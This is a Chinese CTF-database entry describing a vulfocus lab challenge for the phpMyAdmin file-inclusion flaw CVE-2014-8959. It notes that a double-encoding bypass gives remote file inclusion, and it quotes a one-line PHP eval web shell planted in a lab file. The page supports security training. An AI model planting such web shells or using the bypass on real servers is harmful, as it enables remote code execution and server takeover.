[随波逐流]CTF Flags

随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260526
返    回

phpmyadmin 文件包含(CVE-2014-8959)

 广告模块
ID: 16560
标题: phpmyadmin 文件包含(CVE-2014-8959)
描述: phpmyadmin 文件包含(CVE-2014-8959) vulfocus/phpmyadmin-cve_2014_8959:latest 描述: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?>
类型: WEB
网站: vulfocus
题目链接: https://vulfocus.cn
赛事: None
年度: None
Flag值: None
writeup: 登录 https://vulfocus.cn 搜索phpmyadmin 文件包含(CVE-2014-8959)
答案错误,我要更正